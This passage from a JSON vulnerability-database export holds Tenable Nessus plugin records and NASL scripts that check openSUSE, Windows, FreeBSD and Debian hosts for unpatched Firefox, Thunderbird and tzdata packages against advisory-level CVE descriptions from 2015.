Arbitrary file\n overwriting through Mozilla Maintenance Service with\n hard links (only affected Windows)\n\n - MFSA 2015-85/CVE-2015-4482 (bmo#1184500) Out-of-bounds\n write with Updater and malicious MAR file (does not\n affect openSUSE RPM packages which do not ship the\n updater)\n\n - MFSA 2015-87/CVE-2015-4484 (bmo#1171540) Crash when\n using shared memory in JavaScript\n\n - MFSA 2015-88/CVE-2015-4491 (bmo#1184009) Heap overflow\n in gdk-pixbuf when scaling bitmap images\n\n - MFSA 2015-89/CVE-2015-4485/CVE-2015-4486 (bmo#1177948,\n bmo#1178148) Buffer overflows on Libvpx when decoding\n WebM video\n\n - MFSA 2015-90/CVE-2015-4487/CVE-2015-4488/CVE-2015-4489\n Vulnerabilities found through code inspection\n\n - MFSA 2015-92/CVE-2015-4492 (bmo#1185820) Use-after-free\n in XMLHttpRequest with shared workers\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=940806\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected MozillaThunderbird packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-buildsymbols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-translations-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-translations-other\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/08/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"MozillaThunderbird-38.2.0-70.60.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"MozillaThunderbird-buildsymbols-38.2.0-70.60.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"MozillaThunderbird-debuginfo-38.2.0-70.60.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"MozillaThunderbird-debugsource-38.2.0-70.60.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"MozillaThunderbird-devel-38.2.0-70.60.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"MozillaThunderbird-translations-common-38.2.0-70.60.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"MozillaThunderbird-translations-other-38.2.0-70.60.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MozillaThunderbird / MozillaThunderbird-buildsymbols / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:24:52", "bulletinFamily": "scanner", "description": "The version of Firefox ESR installed on the remote Windows host is prior to 38.2. It is, therefore, affected by the following vulnerabilities :\n\n - Multiple memory corruption issues exist that allow a remote attacker, via a specially crafted web page, to corrupt memory and potentially execute arbitrary code.\n (CVE-2015-4473)\n\n - An out-of-bounds read error exists in the PlayFromAudioQueue() function due to improper handling of mismatched sample formats. A remote attacker can exploit this, via a specially crafted MP3 file, to disclose memory contents or execute arbitrary code.\n (CVE-2015-4475)\n\n - A same-origin policy bypass vulnerability exists due to non-configurable properties being redefined in violation of the ECMAScript 6 standard during JSON parsing. A remote attacker can exploit this, by editing these properties to arbitrary values, to bypass the same-origin policy. (CVE-2015-4478)\n\n - Multiple integer overflow conditions exist due to improper validation of user-supplied input when handling 'saio' chunks in MPEG4 video. A remote attacker can exploit this, via a specially crafted MPEG4 file, to execute arbitrary code. (CVE-2015-4479)\n\n - An integer overflow condition exists in the bundled libstagefright component when handling H.264 media content. A remote attacker can exploit this, via a specially crafted MPEG4 file, to execute arbitrary code.\n (CVE-2015-4480)\n\n - An arbitrary file overwrite vulnerability exists in the Mozilla Maintenance Service due to a race condition. An attacker can exploit this, via the use of a hard link, to overwrite arbitrary files with log output.\n (CVE-2015-4481)\n\n - An out-of-bounds write error exists due to an array indexing flaw in the mar_consume_index() function when handling index names in MAR files. An attacker can exploit this to execute arbitrary code. (CVE-2015-4482)\n\n - A denial of service vulnerability exists when handling JavaScript using shared memory without properly gating access to Atomics and SharedArrayBuffer views. An attacker can exploit this to crash the program, resulting in a denial of service condition.\n (CVE-2015-4484)\n\n - A heap-based buffer overflow condition exists in the resize_context_buffers() function due to improper validation of user-supplied input. A remote attacker can exploit this, via specially crafted WebM content, to cause a heap-based buffer overflow, resulting in the execution of arbitrary code. (CVE-2015-4485)\n\n - A heap-based buffer overflow condition exists in the decrease_ref_count() function due to improper validation of user-supplied input. A remote attacker can exploit this, via specially crafted WebM content, to cause a heap-based buffer overflow, resulting in the execution of arbitrary code. (CVE-2015-4486)\n\n - A buffer overflow condition exists in the ReplacePrep() function. A remote attacker can exploit this to cause a buffer overflow, resulting in the execution of arbitrary code. (CVE-2015-4487)\n\n - A use-after-free error exists in the operator=() function. An attacker can exploit this to dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2015-4488)\n\n - A memory corruption issue exists in the nsTArray_Impl() function due to improper validation of user-supplied input during self-assignment. An attacker can exploit this to corrupt memory, resulting in the execution of arbitrary code. (CVE-2015-4489)\n\n - A use-after-free error exists in the XMLHttpRequest::Open() function due to improper handling of recursive calls. An attacker can exploit this to dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2015-4492)\n\n - An integer underflow condition exists in the bundled libstagefright library. An attacker can exploit this to crash the application, resulting in a denial of service condition. (CVE-2015-4493)", "modified": "2018-07-16T00:00:00", "id": "MOZILLA_FIREFOX_38_2_ESR.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=85385", "published": "2015-08-13T00:00:00", "title": "Firefox ESR < 38.2 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85385);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/07/16 14:09:14\");\n\n script_cve_id(\n \"CVE-2015-4473\",\n \"CVE-2015-4475\",\n \"CVE-2015-4478\",\n \"CVE-2015-4479\",\n \"CVE-2015-4480\",\n \"CVE-2015-4481\",\n \"CVE-2015-4482\",\n \"CVE-2015-4484\",\n \"CVE-2015-4485\",\n \"CVE-2015-4486\",\n \"CVE-2015-4487\",\n \"CVE-2015-4488\",\n \"CVE-2015-4489\",\n \"CVE-2015-4492\",\n \"CVE-2015-4493\"\n );\n script_bugtraq_id(76294, 76297);\n\n script_name(english:\"Firefox ESR < 38.2 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Firefox.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Firefox ESR installed on the remote Windows host is\nprior to 38.2. It is, therefore, affected by the following\nvulnerabilities :\n\n - Multiple memory corruption issues exist that allow a\n remote attacker, via a specially crafted web page, to\n corrupt memory and potentially execute arbitrary code.\n (CVE-2015-4473)\n\n - An out-of-bounds read error exists in the\n PlayFromAudioQueue() function due to improper handling\n of mismatched sample formats. A remote attacker can\n exploit this, via a specially crafted MP3 file, to\n disclose memory contents or execute arbitrary code.\n (CVE-2015-4475)\n\n - A same-origin policy bypass vulnerability exists due to\n non-configurable properties being redefined in violation\n of the ECMAScript 6 standard during JSON parsing. A\n remote attacker can exploit this, by editing these\n properties to arbitrary values, to bypass the\n same-origin policy. (CVE-2015-4478)\n\n - Multiple integer overflow conditions exist due to\n improper validation of user-supplied input when handling\n 'saio' chunks in MPEG4 video. A remote attacker can\n exploit this, via a specially crafted MPEG4 file, to\n execute arbitrary code. (CVE-2015-4479)\n\n - An integer overflow condition exists in the bundled\n libstagefright component when handling H.264 media\n content. A remote attacker can exploit this, via a\n specially crafted MPEG4 file, to execute arbitrary code.\n (CVE-2015-4480)\n\n - An arbitrary file overwrite vulnerability exists in the\n Mozilla Maintenance Service due to a race condition. An\n attacker can exploit this, via the use of a hard link,\n to overwrite arbitrary files with log output.\n (CVE-2015-4481)\n\n - An out-of-bounds write error exists due to an array\n indexing flaw in the mar_consume_index() function when\n handling index names in MAR files. An attacker can\n exploit this to execute arbitrary code. (CVE-2015-4482)\n\n - A denial of service vulnerability exists when handling\n JavaScript using shared memory without properly gating\n access to Atomics and SharedArrayBuffer views. An\n attacker can exploit this to crash the program,\n resulting in a denial of service condition.\n (CVE-2015-4484)\n\n - A heap-based buffer overflow condition exists in the \n resize_context_buffers() function due to improper\n validation of user-supplied input. A remote attacker can\n exploit this, via specially crafted WebM content, to\n cause a heap-based buffer overflow, resulting in the\n execution of arbitrary code. (CVE-2015-4485)\n\n - A heap-based buffer overflow condition exists in the \n decrease_ref_count() function due to improper validation\n of user-supplied input. A remote attacker can exploit\n this, via specially crafted WebM content, to cause a\n heap-based buffer overflow, resulting in the execution\n of arbitrary code. (CVE-2015-4486)\n\n - A buffer overflow condition exists in the ReplacePrep()\n function. A remote attacker can exploit this to cause a\n buffer overflow, resulting in the execution of arbitrary\n code. (CVE-2015-4487)\n\n - A use-after-free error exists in the operator=()\n function. An attacker can exploit this to dereference\n already freed memory, resulting in the execution of\n arbitrary code. (CVE-2015-4488)\n\n - A memory corruption issue exists in the nsTArray_Impl()\n function due to improper validation of user-supplied\n input during self-assignment. An attacker can exploit\n this to corrupt memory, resulting in the execution of\n arbitrary code. (CVE-2015-4489)\n\n - A use-after-free error exists in the\n XMLHttpRequest::Open() function due to improper handling\n of recursive calls. An attacker can exploit this to\n dereference already freed memory, resulting in the\n execution of arbitrary code. (CVE-2015-4492)\n\n - An integer underflow condition exists in the bundled\n libstagefright library. An attacker can exploit this to\n crash the application, resulting in a denial of service\n condition. (CVE-2015-4493)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-79/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-80/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-82/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-83/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-84/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-85/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-87/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-89/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-90/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-92/\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Firefox ESR 38.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/08/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:firefox_esr\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"mozilla_org_installed.nasl\");\n script_require_keys(\"Mozilla/Firefox/Version\");\n\n exit(0);\n}\n\ninclude(\"mozilla_version.inc\");\n\nport = get_kb_item(\"SMB/transport\");\nif (!port) port = 445;\n\ninstalls = get_kb_list(\"SMB/Mozilla/Firefox/*\");\nif (isnull(installs)) audit(AUDIT_NOT_INST, \"Firefox\");\n\nmozilla_check_version(installs:installs, product:'firefox', esr:TRUE, fix:'38.2', severity:SECURITY_HOLE);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:24:50", "bulletinFamily": "scanner", "description": "The Mozilla Project reports :\n\nMFSA 2015-79 Miscellaneous memory safety hazards (rv:40.0 / rv:38.2)\n\nMFSA 2015-80 Out-of-bounds read with malformed MP3 file\n\nMFSA 2015-81 Use-after-free in MediaStream playback\n\nMFSA 2015-82 Redefinition of non-configurable JavaScript object properties\n\nMFSA 2015-83 Overflow issues in libstagefright\n\nMFSA 2015-84 Arbitrary file overwriting through Mozilla Maintenance Service with hard links\n\nMFSA 2015-85 Out-of-bounds write with Updater and malicious MAR file\n\nMFSA 2015-86 Feed protocol with POST bypasses mixed content protections\n\nMFSA 2015-87 Crash when using shared memory in JavaScript\n\nMFSA 2015-88 Heap overflow in gdk-pixbuf when scaling bitmap images\n\nMFSA 2015-90 Vulnerabilities found through code inspection\n\nMFSA 2015-91 Mozilla Content Security Policy allows for asterisk wildcards in violation of CSP specification\n\nMFSA 2015-92 Use-after-free in XMLHttpRequest with shared workers", "modified": "2018-11-23T00:00:00", "id": "FREEBSD_PKG_C66A5632708A47278236D65B2D5B2739.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=85338", "published": "2015-08-12T00:00:00", "title": "FreeBSD : mozilla -- multiple vulnerabilities (c66a5632-708a-4727-8236-d65b2d5b2739)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85338);\n script_version(\"2.9\");\n script_cvs_date(\"Date: 2018/11/23 12:49:57\");\n\n script_cve_id(\"CVE-2015-4473\", \"CVE-2015-4474\", \"CVE-2015-4475\", \"CVE-2015-4477\", \"CVE-2015-4478\", \"CVE-2015-4479\", \"CVE-2015-4480\", \"CVE-2015-4481\", \"CVE-2015-4482\", \"CVE-2015-4483\", \"CVE-2015-4484\", \"CVE-2015-4487\", \"CVE-2015-4488\", \"CVE-2015-4489\", \"CVE-2015-4490\", \"CVE-2015-4491\", \"CVE-2015-4492\", \"CVE-2015-4493\");\n\n script_name(english:\"FreeBSD : mozilla -- multiple vulnerabilities (c66a5632-708a-4727-8236-d65b2d5b2739)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Mozilla Project reports :\n\nMFSA 2015-79 Miscellaneous memory safety hazards (rv:40.0 / rv:38.2)\n\nMFSA 2015-80 Out-of-bounds read with malformed MP3 file\n\nMFSA 2015-81 Use-after-free in MediaStream playback\n\nMFSA 2015-82 Redefinition of non-configurable JavaScript object\nproperties\n\nMFSA 2015-83 Overflow issues in libstagefright\n\nMFSA 2015-84 Arbitrary file overwriting through Mozilla Maintenance\nService with hard links\n\nMFSA 2015-85 Out-of-bounds write with Updater and malicious MAR file\n\nMFSA 2015-86 Feed protocol with POST bypasses mixed content\nprotections\n\nMFSA 2015-87 Crash when using shared memory in JavaScript\n\nMFSA 2015-88 Heap overflow in gdk-pixbuf when scaling bitmap images\n\nMFSA 2015-90 Vulnerabilities found through code inspection\n\nMFSA 2015-91 Mozilla Content Security Policy allows for asterisk\nwildcards in violation of CSP specification\n\nMFSA 2015-92 Use-after-free in XMLHttpRequest with shared workers\"\n );\n # https://www.mozilla.org/security/advisories/mfsa2015-79/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-79/\"\n );\n # https://www.mozilla.org/security/advisories/mfsa2015-80/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-80/\"\n );\n # https://www.mozilla.org/security/advisories/mfsa2015-81/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-81/\"\n );\n # https://www.mozilla.org/security/advisories/mfsa2015-82/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-82/\"\n );\n # https://www.mozilla.org/security/advisories/mfsa2015-83/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-83/\"\n );\n # https://www.mozilla.org/security/advisories/mfsa2015-84/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-84/\"\n );\n # https://www.mozilla.org/security/advisories/mfsa2015-85/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-85/\"\n );\n # https://www.mozilla.org/security/advisories/mfsa2015-86/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-86/\"\n );\n # https://www.mozilla.org/security/advisories/mfsa2015-87/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-87/\"\n );\n # https://www.mozilla.org/security/advisories/mfsa2015-88/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-88/\"\n );\n # https://www.mozilla.org/security/advisories/mfsa2015-90/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-90/\"\n );\n # https://www.mozilla.org/security/advisories/mfsa2015-91/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-91/\"\n );\n # https://www.mozilla.org/security/advisories/mfsa2015-92/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-92/\"\n );\n # https://vuxml.freebsd.org/freebsd/c66a5632-708a-4727-8236-d65b2d5b2739.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?51eb6e56\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:firefox-esr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:libxul\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-seamonkey\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:seamonkey\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/08/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"firefox<40.0,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-firefox<40.0,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"seamonkey>=2.36<2.37\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"seamonkey<2.35\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-seamonkey>=2.36<2.37\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-seamonkey<2.35\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"firefox-esr<38.2.0,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"libxul<38.2.0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"thunderbird<38.2.0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-thunderbird<38.2.0\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:23:48", "bulletinFamily": "scanner", "description": "Upstream published version 2014h.\n\nChanges since 2014e-0squeeze1 currently in squeeze are adjustments to the DST rules of Russia and a time zone change for Turks & Caicos.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2015-12-02T00:00:00", "id": "DEBIAN_DLA-73.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=82218", "published": "2015-03-26T00:00:00", "title": "Debian DLA-73-1 : tzdata update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-73-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82218);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2015/12/02 20:16:13 $\");\n\n script_name(english:\"Debian DLA-73-1 : tzdata update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Upstream published version 2014h.\n\nChanges since 2014e-0squeeze1 currently in squeeze are adjustments to\nthe DST rules of Russia and a time zone change for Turks & Caicos.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2014/10/msg00006.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze-lts/tzdata\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected tzdata, and tzdata-java packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tzdata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tzdata-java\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"tzdata\", reference:\"2014h-0squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"tzdata-java\", reference:\"2014h-0squeeze1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": 